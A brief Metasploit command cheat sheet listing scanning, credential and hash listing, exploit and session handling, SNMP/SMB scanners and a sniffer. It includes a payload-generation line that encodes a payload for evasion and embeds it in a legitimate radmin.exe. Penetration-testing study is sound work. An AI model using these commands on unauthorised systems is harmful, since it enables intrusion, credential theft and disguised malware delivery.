metasploit基本操作

connect 192.168.1.1
show options
search ms10-046
search path:mysql
info
back
set RHOST 192.168.1.1
unset
setg    // set global
unsetg
check
db_status
db_nmap 192.168.1.1
db_nmap -A 192.168.1.1
db_connect -y /usr/share/metasploit-framework/config/database.yml
hosts
hosts -u
hosts -S Windows
services
services -p 445
search mysql_login
creds   // show credentials
vulns   // show vulnerabilities
loot    // show hash password
db_export
db_import
save    // save config
exploit
exploit -j  // run background
jobs
show payloads
set payloads xxx
sessions
sessions -l
sessions -i 2
load openvas
load nessus
unload openvas
route add   // set session number
resource    // set resource

use exploit

use payload
generate
generate -b '\x00'
show encoders
generate -e x86/nonalpha
generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
generate -n 14  // 14 nops
generate -f c

use auxiliary/scanner
db_nmap 192.168.74.0/24
db_nmap -sV 192.168.74.0/24
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/portscan/syn

use auxiliary/scanner/ip/ipidseq    // idle ipid
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/sniffer/psnuffle
kill 0  // kill id
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/smb/*